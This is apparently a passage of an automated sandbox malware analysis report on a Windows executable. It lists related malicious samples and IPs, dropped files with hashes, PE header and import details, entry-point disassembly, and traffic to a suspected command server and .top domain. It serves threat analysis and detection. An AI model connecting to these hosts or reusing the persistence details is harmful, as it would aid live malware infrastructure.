            iosoftware.org4B32N61SUN.exeGet hashmaliciousBrowse
            • 139.60.161.75
            umpa0fYSwl.exeGet hashmaliciousBrowse
            • 139.60.161.75
            v0VaFGKpQR.exeGet hashmaliciousBrowse
            • 139.60.161.75
            Yob73TQCPI.exeGet hashmaliciousBrowse
            • 139.60.161.75
            GwGRsPZJO7.exeGet hashmaliciousBrowse
            • 139.60.161.75
            GhlYvtlwHA.exeGet hashmaliciousBrowse
            • 139.60.161.75
            WSWw3rqaqL.exeGet hashmaliciousBrowse
            • 139.60.161.75

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            PINDC-ASRU4B32N61SUN.exeGet hashmaliciousBrowse
            • 5.188.88.118
            umpa0fYSwl.exeGet hashmaliciousBrowse
            • 5.188.88.118
            Nov_SOA_MT103.xlsxGet hashmaliciousBrowse
            • 91.240.242.111
            triage_dropped_file.exeGet hashmaliciousBrowse
            • 91.240.242.111
            Gno6CluFsB.exeGet hashmaliciousBrowse
            • 91.240.242.111
            QUOTATION REQUEST document file 465.exeGet hashmaliciousBrowse
            • 91.240.242.111
            Zo7DiD3qYT.exeGet hashmaliciousBrowse
            • 91.240.242.111
            s20KNIIaif.exeGet hashmaliciousBrowse
            • 91.240.242.111
            fXvJwoVvee.exeGet hashmaliciousBrowse
            • 91.240.242.111
            DVv7dqTcMg.exeGet hashmaliciousBrowse
            • 91.240.242.111
            Quotation Forms_MV YU FENG4 TRADER.xlsxGet hashmaliciousBrowse
            • 91.240.242.111
            Quotation form MV YU FENG4 TRADER.xlsxGet hashmaliciousBrowse
            • 91.240.242.111
            MV Glorious Sea.xlsxGet hashmaliciousBrowse
            • 91.240.242.111
            Requisition for spare parts1.xlsxGet hashmaliciousBrowse
            • 91.240.242.111
            AWsh7ps5RC.exeGet hashmaliciousBrowse
            • 91.240.242.111
            IxG7d9No5Q.exeGet hashmaliciousBrowse
            • 5.188.88.190
            AyAj5GJqIg.exeGet hashmaliciousBrowse
            • 5.188.88.203
            Md0q201V1D.exeGet hashmaliciousBrowse
            • 5.188.88.203
            yj2Lz2zdxp.exeGet hashmaliciousBrowse
            • 5.188.88.203
            y1JBw0eea5.exeGet hashmaliciousBrowse
            • 5.188.88.203
            HOSTKEY-USAUS4B32N61SUN.exeGet hashmaliciousBrowse
            • 139.60.161.75
            umpa0fYSwl.exeGet hashmaliciousBrowse
            • 139.60.161.75
            v0VaFGKpQR.exeGet hashmaliciousBrowse
            • 139.60.161.75
            Yob73TQCPI.exeGet hashmaliciousBrowse
            • 139.60.161.75
            rMVpcZ73UK.exeGet hashmaliciousBrowse
            • 139.60.160.200
            8Jem3WHfr1.exeGet hashmaliciousBrowse
            • 139.60.160.200
            3Pmz7pGNI6.exeGet hashmaliciousBrowse
            • 139.60.160.200
            2kozcBdouI.exeGet hashmaliciousBrowse
            • 139.60.160.200
            j8Ng2Kt6YP.exeGet hashmaliciousBrowse
            • 139.60.160.200
            trz51D4.exeGet hashmaliciousBrowse
            • 139.60.161.68
            trz51D4.exeGet hashmaliciousBrowse
            • 139.60.161.68
            mixazed.exeGet hashmaliciousBrowse
            • 139.60.161.63
            service4.exeGet hashmaliciousBrowse
            • 139.60.161.68
            service4.exeGet hashmaliciousBrowse
            • 139.60.161.68
            file.dllGet hashmaliciousBrowse
            • 139.60.161.99
            o7w2HSi17V.exeGet hashmaliciousBrowse
            • 139.60.163.56
            trz51D4.exeGet hashmaliciousBrowse
            • 139.60.161.68
            trz51D4.exeGet hashmaliciousBrowse
            • 139.60.161.68
            evil.docGet hashmaliciousBrowse
            • 139.60.161.74
            evil.docGet hashmaliciousBrowse
            • 139.60.161.74

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\6128.tmp
            Process:C:\Windows\SysWOW64\explorer.exe
            File Type:SQLite 3.x database, last written using SQLite version 3032001
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.792852251086831
            Encrypted:false
            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
            Malicious:false
            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\6476.tmp
            Process:C:\Windows\SysWOW64\explorer.exe
            File Type:SQLite 3.x database, last written using SQLite version 3032001
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.6970840431455908
            Encrypted:false
            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
            MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
            SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
            SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
            SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
            Malicious:false
            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\6708.tmp
            Process:C:\Windows\SysWOW64\explorer.exe
            File Type:SQLite 3.x database, last written using SQLite version 3032001
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.5110032006906435
            Encrypted:false
            SSDEEP:12:TL1t4ufFdbXGwcFOaOndOtJRbGMNmt2SH/+eVpUHFxOUwa5q0S93BPZ75fOS:TLLJLbXaFpEO5bNmISHn06UwcQPx5fB
            MD5:3219CA933D97DF8F5931EF68B7EEDF04
            SHA1:D79FEE14CBDE4E92447996C9FB37ADCB673B6138
            SHA-256:21DE8DD11459659421BA1DBC554C15A3756FF1A38CC797A139D407F1F94092B4
            SHA-512:A3CFCC17612975C5630B49736F4B535555D06B23E3523E46495020B8B55B2361C4B5EF39FE649273F2D323BE0EC138707E67DC59EB719BA8EF676439491662AC
            Malicious:false
            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\cveiudv
            Process:C:\Windows\explorer.exe
            File Type:data
            Category:modified
            Size (bytes):422174
            Entropy (8bit):7.9995511013879135
            Encrypted:true
            SSDEEP:12288:TCpGNN3qZTiF2HBupddNvuYke2ECsmcsKL6zzS1iyE/:GSN3qZT+2opdrvtksCsnsc18
            MD5:B13B4E1CB91F37EC7EB8E449AF7BAD81
            SHA1:7AF7D20E70B230670A90F14C5C8AC7B222A0411A
            SHA-256:F8352AC185B423B72C0F8D64C4E4AC80B6D56419CE27501DC2B5D7D26DDCEC64
            SHA-512:0E520B75F8ABA7F52B5295CDC6BD969B191A70B232B94CF9976F3A34983F5E6045A2E531FFAA03A006F8F62A9642E3E1FB84E73D47AC492C4A156F0B52078272
            Malicious:false
            Preview: .s..d...T6aK[.%B6.i..._5."..........e...7E..*C...5.4.....J.c...v......+.Q.y..........>...G.n.2(...'..v...1./...~-.'.iE.Dc.n.....O[Q.}..........5.....|WT..4.".pa(...uF..R..^.%..>........b.lP.%...g.y..)..d.=..1..p.u....4.q..^k....B...n..9.M\.U-R....I.7?/......<V...Y..3......Y.q.........C..D.:...^2.Zy...)....x...p{.....w.=.X..i..{?$CV.<..;......b.v..'...8....Hc<.l/..c...).^f......(#...U..p..g;.P...].H..'.b........G....M.......vAj..z .^+......n..qg.s..K..3L.....n?.d.3b.....]......du7.E....SNi.D1NA...+..*2.[^...b.....&..h|rP.=....VR..y.....3n..0..........U..n%A2....~.$W.W+..u...M.7;.X......."_...}..Xn.-6\?L.4.R..%..B...A...$+..R8>....D....pc.h....K9u..i...A4k.*}d.EjF...`.&..M>.X..f...$F...C*?.a:....f....7......ri9.o.#U..F..<~....C..Sj.T..M......g.z5w.2.j............_..[[..\/..KA.....cZ.0S..Z...........1N......<...%Y..&0`p8hSz,...W.#t...V....?.zQ..}........B..e.F...#xW.rA.k..s....s.......WF..O_u.N.(?..J.....7.....w...o..|B3s
            C:\Users\user\AppData\Roaming\favdejf
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):285184
            Entropy (8bit):5.909368896887488
            Encrypted:false
            SSDEEP:3072:80Zpf7ywrLoWHdAucQoHnSzG+dWpvgne52lPxsBvBPoeg8MRkY34R3R8UJPb9wy:RIUJcQk3+WvgnJla7oe0RdIdRzYy
            MD5:8696A4269E30DDB34A7E0E84629EDE03
            SHA1:125198E1F636EF118E468145D02E801A3FFE2A97
            SHA-256:47EC411EAB0AA15619F24CAA6256ED4CA5CFC695A26F5B71830B53B07C22B05B
            SHA-512:481AE35EC056DE3C08AE167E7B2FEA9352C82A7CD47EBBC46047270E1A0F518B3FEECE8AD6900D0A5AC5CA1B44C80DA0E916504809E93E176933931D940CAD96
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 56%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..'t..tt..tt..t..Wt]..t..bte..t..Vt...t}.ot...tt..t...t..Stu..t..ftu..t..atu..tRicht..t................PE..L.... l_.............................z............@.............................................................................x....`...D..........................`................................x..@............................................text............................... ..`.data....J..........................@....rsrc....D...`...F..................@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\favdejf:Zone.Identifier
            Process:C:\Windows\explorer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview: [ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.909368896887488
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:1RMZ62tUAl.exe
            File size:285184
            MD5:8696a4269e30ddb34a7e0e84629ede03
            SHA1:125198e1f636ef118e468145d02e801a3ffe2a97
            SHA256:47ec411eab0aa15619f24caa6256ed4ca5cfc695a26f5b71830b53b07c22b05b
            SHA512:481ae35ec056de3c08ae167e7b2fea9352c82a7cd47ebbc46047270e1a0f518b3feece8ad6900d0a5ac5ca1b44c80da0e916504809e93e176933931d940cad96
            SSDEEP:3072:80Zpf7ywrLoWHdAucQoHnSzG+dWpvgne52lPxsBvBPoeg8MRkY34R3R8UJPb9wy:RIUJcQk3+WvgnJla7oe0RdIdRzYy
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..'t..tt..tt..t..Wt]..t..bte..t..Vt...t}.ot...tt..t...t..Stu..t..ftu..t..atu..tRicht..t................PE..L.... l_...........

            File Icon

            Icon Hash:aecaae9ecea62aa2

            Static PE Info

            General

            Entrypoint:0x417ad0
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
            Time Stamp:0x5F6C20F2 [Thu Sep 24 04:30:42 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:ff6439958bc7d1b926a3ea41188420fe

            Entrypoint Preview

            Instruction
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F3258C8E16Bh
            call 00007F3258C8DE76h
            pop ebp
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov edi, edi
            push ebp
            mov ebp, esp
            push FFFFFFFEh
            push 0042EF30h
            push 0041BCF0h
            mov eax, dword ptr fs:[00000000h]
            push eax
            add esp, FFFFFF98h
            push ebx
            push esi
            push edi
            mov eax, dword ptr [00431064h]
            xor dword ptr [ebp-08h], eax
            xor eax, ebp
            push eax
            lea eax, dword ptr [ebp-10h]
            mov dword ptr fs:[00000000h], eax
            mov dword ptr [ebp-18h], esp
            mov dword ptr [ebp-70h], 00000000h
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [00401078h]
            cmp dword ptr [01FB4ABCh], 00000000h
            jne 00007F3258C8DE70h
            push 00000000h
            push 00000000h
            push 00000001h
            push 00000000h
            call dword ptr [00401130h]
            call 00007F3258C8DFF3h
            mov dword ptr [ebp-6Ch], eax
            call 00007F3258C91FBBh
            test eax, eax
            jne 00007F3258C8DE6Ch
            push 0000001Ch
            call 00007F3258C8DFB0h
            add esp, 04h
            call 00007F3258C91918h
            test eax, eax
            jne 00007F3258C8DE6Ch
            push 00000010h
            call 00007F3258C8DF9Dh
            add esp, 04h
            push 00000001h
            call 00007F3258C91863h
            add esp, 04h
            call 00007F3258C8F51Bh
            mov dword ptr [ebp-04h], 00000000h
            call 00007F3258C8F0FFh
            test eax, eax

            Rich Headers

            Programming Language:
            • [LNK] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x2f5140x78.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1bb60000x44c0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1bbb0000x1698.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x12600x1c.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x178f80x40.text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x210.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x2f18a0x2f200False0.615742083886data7.06143863939IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x310000x1b84ac00x1400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x1bb60000x44c00x4600False0.707645089286data6.19981176683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x1bbb0000x108180x10a00False0.0732935855263data0.963621944631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x1bb62400x25a8dataSpanishParaguay
            RT_ICON0x1bb87e80x10a8dataSpanishParaguay
            RT_STRING0x1bb9ac80xe2dataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x1bb9bb00x30adataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x1bb9ec00x5fadataDivehi; Dhivehi; MaldivianMaldives
            RT_ACCELERATOR0x1bb99180x80dataDivehi; Dhivehi; MaldivianMaldives
            RT_ACCELERATOR0x1bb98b80x60dataDivehi; Dhivehi; MaldivianMaldives
            RT_GROUP_ICON0x1bb98900x22dataSpanishParaguay
            RT_VERSION0x1bb99980x12cdataDivehi; Dhivehi; MaldivianMaldives

            Imports

            DLLImport
            KERNEL32.dllSetWaitableTimer, SetDllDirectoryW, InterlockedIncrement, _lwrite, SetFirmwareEnvironmentVariableA, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, SetHandleInformation, GetComputerNameW, GetModuleHandleW, GetTickCount, GetProcessHeap, GetConsoleAliasesLengthA, ConvertFiberToThread, ReadConsoleW, GetCompressedFileSizeW, GetSystemWow64DirectoryA, TlsSetValue, LoadLibraryW, GetConsoleMode, CopyFileW, SetVolumeMountPointA, GetVersionExW, HeapCreate, HeapValidate, GetModuleFileNameW, CreateActCtxA, GetACP, GetStartupInfoW, WritePrivateProfileStringW, VerifyVersionInfoW, FindFirstFileExA, GetLastError, IsDBCSLeadByteEx, SetLastError, lstrlenA, GetLongPathNameA, CreateNamedPipeA, CopyFileA, FindClose, GetPrivateProfileStringA, ProcessIdToSessionId, LocalAlloc, IsWow64Process, SetCurrentDirectoryW, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, SetConsoleCursorInfo, GetProcessShutdownParameters, FreeEnvironmentStringsW, WriteProfileStringW, BuildCommDCBA, VirtualProtect, CompareStringA, GetSystemRegistryQuota, ReadConsoleInputW, FileTimeToLocalFileTime, CreateWaitableTimerA, GetSystemTime, TlsFree, CommConfigDialogW, CloseHandle, CreateFileW, SetStdHandle, RaiseException, FlushFileBuffers, GetConsoleCP, BackupRead, WriteConsoleInputW, SetFilePointer, IsProcessorFeaturePresent, OutputDebugStringW, WriteConsoleW, GetCommandLineW, HeapSetInformation, SetUnhandledExceptionFilter, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, InterlockedDecrement, DecodePointer, GetProcAddress, ExitProcess, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, IsBadReadPtr, EncodePointer, TlsAlloc, TlsGetValue, WriteFile, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, OutputDebugStringA
            USER32.dllGetMessageTime, GetCaretBlinkTime, GetMenuItemID, GetMonitorInfoA, GetCursorInfo, GetListBoxInfo, GetMenuInfo, GetComboBoxInfo, GetMenuBarInfo
            GDI32.dllGetBitmapBits
            WINHTTP.dllWinHttpWriteData
            MSIMG32.dllGradientFill

            Version Infos

            DescriptionData
            Translations0x0022 0x023c

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            SpanishParaguay
            Divehi; Dhivehi; MaldivianMaldives

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Nov 18, 2021 10:44:30.085329056 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.157572985 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.158026934 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.158356905 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.158390999 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.230472088 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.514741898 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.514771938 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.514784098 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.514796019 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.514861107 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.514924049 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.515110016 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.515134096 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.515153885 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.515175104 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.515198946 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.515234947 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.515511036 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.515568972 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.515619993 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.586787939 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586843014 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586858988 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586874962 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586911917 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586945057 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586963892 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.586986065 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587021112 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587018013 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.587054968 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587084055 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587104082 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587117910 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.587133884 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587153912 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.587158918 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587161064 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.587172031 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587186098 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587234974 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.587275982 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587316990 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587344885 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587367058 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.587399960 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.587433100 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659010887 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659091949 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659142017 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659190893 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659193993 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659244061 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659245014 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659291983 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659316063 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659331083 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659336090 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659357071 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659378052 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659380913 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659398079 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659413099 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659419060 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659439087 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659459114 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659461975 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659482956 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659498930 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659503937 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659523964 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659540892 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659544945 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659565926 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659583092 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659588099 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659609079 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659624100 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659630060 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659650087 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659665108 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659671068 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659692049 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659699917 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659714937 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659735918 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659750938 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659758091 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659779072 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659799099 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659800053 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659820080 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659831047 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659840107 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659862995 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659883976 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659888983 CET4974980192.168.2.35.188.88.118
            Nov 18, 2021 10:44:30.659905910 CET80497495.188.88.118192.168.2.3
            Nov 18, 2021 10:44:30.659929037 CET80497495.188.88.118192.168.2.3

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Nov 18, 2021 10:44:29.788239002 CET6402153192.168.2.38.8.8.8
            Nov 18, 2021 10:44:30.080061913 CET53640218.8.8.8192.168.2.3
            Nov 18, 2021 10:44:31.239069939 CET6078453192.168.2.38.8.8.8
            Nov 18, 2021 10:44:31.259133101 CET53607848.8.8.8192.168.2.3
            Nov 18, 2021 10:44:31.753774881 CET5114353192.168.2.38.8.8.8
            Nov 18, 2021 10:44:31.775317907 CET53511438.8.8.8192.168.2.3
            Nov 18, 2021 10:44:32.049560070 CET5600953192.168.2.38.8.8.8
            Nov 18, 2021 10:44:32.075397015 CET53560098.8.8.8192.168.2.3
            Nov 18, 2021 10:44:49.812151909 CET6329753192.168.2.38.8.8.8
            Nov 18, 2021 10:44:50.187908888 CET53632978.8.8.8192.168.2.3
            Nov 18, 2021 10:44:50.679728985 CET5836153192.168.2.38.8.8.8
            Nov 18, 2021 10:44:50.704993963 CET53583618.8.8.8192.168.2.3
            Nov 18, 2021 10:45:15.733613968 CET5072853192.168.2.38.8.8.8
            Nov 18, 2021 10:45:15.753202915 CET53507288.8.8.8192.168.2.3

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Nov 18, 2021 10:44:29.788239002 CET192.168.2.38.8.8.80xeda6Standard query (0)rsuehfidvdkfvk.topA (IP address)IN (0x0001)
            Nov 18, 2021 10:44:31.239069939 CET192.168.2.38.8.8.80x3738Standard query (0)rsuehfidvdkfvk.topA (IP address)IN (0x0001)
